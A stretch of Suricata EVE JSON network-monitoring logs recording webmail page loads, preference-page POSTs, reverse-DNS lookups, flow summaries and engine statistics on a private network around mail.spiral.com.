{"timestamp":"2020-02-29T00:25:26.838842+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53136,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":0}} {"timestamp":"2020-02-29T00:25:26.839002+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53138,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:29.451829+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":7}} {"timestamp":"2020-02-29T00:25:31.000257+0000","event_type":"stats","stats":{"uptime":15183,"capture":{"kernel_packets":141589,"kernel_drops":0},"decoder":{"pkts":141593,"bytes":97251200,"invalid":195,"ipv4":140006,"ipv6":10,"ethernet":141593,"raw":0,"null":0,"sll":0,"tcp":134432,"udp":5364,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2453,"failed_udp":116},"tx":{"http":4973,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2537}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11227,"memca
p_state":0,"memcap_global":0},"http":{"memuse":1280,"memcap":0}}} {"timestamp":"2020-02-29T00:25:32.000516+0000","flow_id":210589465948869,"event_type":"flow","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:31.635589+0000","end":"2020-02-29T00:20:31.746740+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:32.001504+0000","flow_id":2045171861543121,"event_type":"flow","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:31.841937+0000","end":"2020-02-29T00:20:31.950688+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:33.660270+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14725,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:25:33.933068+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:33.951123+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:34.000675+0000","flow_id":1239998652620537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34284,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":30,"pkts_toclient":63,"bytes_toserver":3393,"bytes_toclient":80771,"start":"2020-02-29T00:24:22.597753+0000","end":"2020-02-29T00:24:27.642179+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:38.000187+0000","event_type":"stats","stats":{"uptime":15190,"capture":{"kernel_packets":141593,"kernel_drops":0},"decoder":{"pkts":141609,"bytes":97258964,"invalid":195,"ipv4":140022,"ipv6":10,"ethernet":141609,"raw":0,"null":0,"sll":0,"tcp":134446,"udp":5366,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2907,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2923,"synack":2914,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1915,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2454,"failed_udp":116},"tx":{"http":4974,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2538}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2536,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10896,"memcap_state":0,"memcap_global":0},"http":{"memuse":57324,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:38.952006+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53140,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.452593+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:39.686533+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.701713+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:40.001334+0000","flow_id":473329795826713,"event_type":"flow","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:39.164889+0000","end":"2020-02-29T00:20:39.276286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000607+0000","flow_id":1649433575501601,"event_type":"flow","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:41.470817+0000","end":"2020-02-29T00:20:41.579975+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:25:42.000814+0000","flow_id":1825376910826116,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:20:41.449156+0000","end":"2020-02-29T00:20:41.556671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:44.702897+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53146,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} 
{"timestamp":"2020-02-29T00:25:45.000180+0000","event_type":"stats","stats":{"uptime":15197,"capture":{"kernel_packets":141617,"kernel_drops":0},"decoder":{"pkts":141630,"bytes":97266988,"invalid":195,"ipv4":140041,"ipv6":10,"ethernet":141630,"raw":0,"null":0,"sll":0,"tcp":134463,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2539,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10565,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:48.000875+0000","flow_id":193285043724562,"event_type":"flow","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:47.794898+0000","end":"2020-02-29T00:20:47.903724+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:49.000616+0000","flow_id":934914226655249,"event_type":"flow","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:48.266257+0000","end":"2020-02-29T00:20:48.377643+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:52.000234+0000","event_type":"stats","stats":{"uptime":15204,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app
_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2541,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9903,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:54.000228+0000","flow_id":25411967806218,"event_type":"flow","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":39,"pkts_toclient":40,"bytes_toserver":3793,"bytes_toclient":50594,"start":"2020-02-29T00:24:48.420618+0000","end":"2020-02-29T00:24:53.581992+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000411+0000","flow_id":1027445017833512,"event_type":"flow","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-29T00:24:48.421928+0000","end":"2020-02-29T00:24:53.434933+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:54.000480+0000","flow_id":2058924363639521,"event_type":"flow","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1768,"bytes_toclient":4862,"start":"2020-02-29T00:24:48.420577+0000","end":"2020-02-29T00:24:53.435236+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000543+0000","flow_id":2226118850538449,"event_type":"flow","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":2976,"start":"2020-02-29T00:24:48.420817+0000","end":"2020-02-29T00:24:53.435205+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000636+0000","flow_id":404301097748814,"event_type":"flow","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1678,"bytes_toclient":13190,"start":"2020-02-29T00:24:48.280910+0000","end":"2020-02-29T00:24:53.435437+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:54.000693+0000","flow_id":1391374776691898,"event_type":"flow","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":1857,"start":"2020-02-29T00:24:48.421050+0000","end":"2020-02-29T00:24:53.434966+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:56.000823+0000","flow_id":1792692210569469,"event_type":"flow","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:55.135421+0000","end":"2020-02-29T00:20:55.246785+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:25:59.000150+0000","event_type":"stats","stats":{"uptime":15211,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2880,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:03.000231+0000","flow_id":574029615970907,"event_type":"flow","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":17,"bytes_toserver":4066,"bytes_toclient":14425,"start":"2020-02-29T00:24:57.178779+0000","end":"2020-02-29T00:25:02.400737+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000608+0000","flow_id":327567212657976,"event_type":"flow","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1796,"bytes_toclient":3211,"start":"2020-02-29T00:24:57.179512+0000","end":"2020-02-29T00:25:02.203210+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000787+0000","flow_id":105264000271271,"event_type":"flow","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":20,"bytes_toserver":3073,"bytes_toclient":17407,"start":"2020-02-29T00:24:56.197543+0000","end":"2020-02-29T00:25:02.207159+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:03.000947+0000","flow_id":1255271558660282,"event_type":"flow","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":2418,"bytes_toclient":6796,"start":"2020-02-29T00:24:57.180410+0000","end":"2020-02-29T00:25:02.203347+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.001092+0000","flow_id":1124614358556355,"event_type":"flow","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":825,"bytes_toclient":3037,"start":"2020-02-29T00:24:57.188099+0000","end":"2020-02-29T00:25:02.196186+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
